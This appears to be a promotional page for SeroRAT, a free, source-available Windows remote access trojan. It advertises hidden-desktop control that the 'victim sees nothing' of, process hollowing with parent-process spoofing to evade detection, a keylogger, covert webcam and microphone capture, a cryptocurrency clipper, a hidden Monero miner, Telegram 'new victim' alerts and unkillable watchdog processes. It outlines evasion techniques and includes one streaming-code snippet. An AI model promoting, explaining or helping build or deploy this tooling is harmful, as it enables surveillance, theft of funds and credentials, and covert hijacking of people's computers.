$ source available  ·  authorized use only  ·  free

SɆⱤØ RAТ

SeroRAT | C2 Desktop App for Windows

HVNC, DXGI remote desktop H.264 up to 144fps+, remote webcam via DirectShow, process hollowing with PPID spoof, NativeAOT stub — 40+ features. Everything the expensive ones have. None of the price tag.

40+ features· AES-256· .NET 10 NativeAOT

SeroRAT
SeroRAT dashboard — client list with online clients

Hidden Virtual Network Computing

HVNC creates a completely isolated Windows desktop session — invisible to the target. Chrome, Edge, Firefox, Brave, Vivaldi, Opera, Opera GX, Telegram, Discord, AyuGram and Explorer launch directly into the shadow session. The victim sees nothing. You see everything.

Each browser gets --start-maximized and fills the HVNC frame. Mouse and keyboard forwarded with pixel-perfect accuracy. Clipboard synced on demand.

The stream is encoded in real time using the Windows Media Foundation H.264 MFT — no FFmpeg, no external codec. Frames are captured from the shadow desktop, converted BGRA→NV12 on the fly, and compressed to H.264 Baseline Annex-B with MF_LOW_LATENCY mode for near-zero encoder delay. Falls back to JPEG if MF is unavailable.

isolated desktop11 appsH.264 streamclipboard syncreal-time input

Process Hollowing — RunPE x64

No new file is dropped — the existing PE is mapped via NtCreateSection(SEC_IMAGE) into the target via NtMapViewOfSection — Windows resolves relocations and IAT automatically. The thread's RIP is redirected to the new entry point, then resumed.

PPID spoofing via UpdateProcThreadAttribute makes the injected process appear as a child of explorer.exe or winlogon.exe. Task Manager, Process Explorer — they see nothing suspicious.

x64no disk writePPID spoofsuspended creatememory remap

WPF Interface — DevExpress

Built on WPF with DevExpress 25.2. A persistent sidebar provides navigation — an icon rail on the left with labelled panels for each feature group. The entire UI adapts to the active theme in real time.

A built-in theme picker offers 20+ presets — Sero Dark (default), DevExpress Dark, Office 2019 family, Visual Studio 2013 themes, The Bezier, and more. Themes apply live with no restart. Interface language switchable across 18 locales.

WPF · DevExpress 25.220+ themes18 languageslive theme switch

SeroRAT Features.

Monitoring

  • Remote Desktop — H.264 stream, DXGI capture, GDI fallback
  • HVNC — isolated hidden desktop, H.264 stream
  • Webcam — DirectShow + VFW
  • Microphone — live listen + WAV save
  • Keylogger — disk logging by date
  • Performance Monitor — CPU / RAM / Net
  • Remote Shell — cmd / PowerShell
  • Speaker — WASAPI loopback capture + inject audio to victim

Administration

  • File Manager — browse / upload / exec
  • Process Manager — tree view, icons
  • Registry Editor — HKLM + HKCU
  • Service / Window / Device Manager
  • TCP Connections + firewall rules
  • Startup Manager
  • Installed Programs — silent uninstall

Offensive

  • RunPE — in-memory + PPID spoof
  • Reverse SOCKS5 proxy
  • Crypto Clipper — 10 coins
  • AutoTask DLL plugins — C++, compiled on demand
  • XMR Miner — configurable hollow target, idle throttle
  • Telegram build notify — install counter + new victim alert
  • Per-HWID AutoTask deduplication
  • Window Notify — keyword alerts + optional Telegram bot screenshots

C2 Framework Pricing.

What others charge for the same thing — often worse, and closed to inspect.

Cobalt Strike $5,000 / yr commercial, closed source
Brute Ratel $2,500 / yr commercial, closed source
PureRAT $2,000 lifetime reversed & leaked anyway
SeroRAT $0 — open source Source available, full code on GitLab

Real screenshots.

No mocked-up demos. Actual captures from the server.

Technical Architecture.

The details that separate a demo from something you'd actually deploy.

  • TLS 1.2+ with certificate pinning

    Shared-key auth on every packet. 3s heartbeat with RTT measurement. Multi-host auto-reconnect with configurable round-robin delay.

  • PPID spoofing in RunPE

    UpdateProcThreadAttribute sets the injected process parent to explorer.exe or winlogon.exe depending on elevation level.

  • Watchdog that can't be killed

    4 guardian processes in dllhost/SearchProtocolHost with PPID spoofing, staggered 800ms apart. File lock + FileSystemWatcher for instant restore.

H264Encoder.cs
// Windows MF H.264 MFT — no FFmpeg, NativeAOT COM vtable
CoCreateInstance(ref CLSID_CMSH264EncoderMFT,
    0, CLSCTX_INPROC_SERVER,
    ref IID_IMFTransform, out _pTransform);

// MF_LOW_LATENCY: zero encoder buffer delay
Set32(pAttribs, MF_LOW_LATENCY, 1);

// Output: H.264 Baseline Annex-B
SetG(pOut, MF_MT_SUBTYPE, MFVideoFormat_H264);
Set32(pOut, MF_MT_MPEG2_PROFILE, 66); // Baseline

// Input: NV12 (BGRA→NV12 BT.601 done in-stub)
SetG(pIn, MF_MT_SUBTYPE, MFVideoFormat_NV12);

// Encode frame → Annex-B NAL → base64 → TLS packet
byte[] nal = _h264Enc.Encode(bgraBits, stride);
_send?.Invoke(PacketType.RdpH264Frame, ToJson(nal));

Contributors.

People who built this.

Open source.
No strings.

Fork it. Build on it. Make it yours.
Just use it on systems you have authorization for.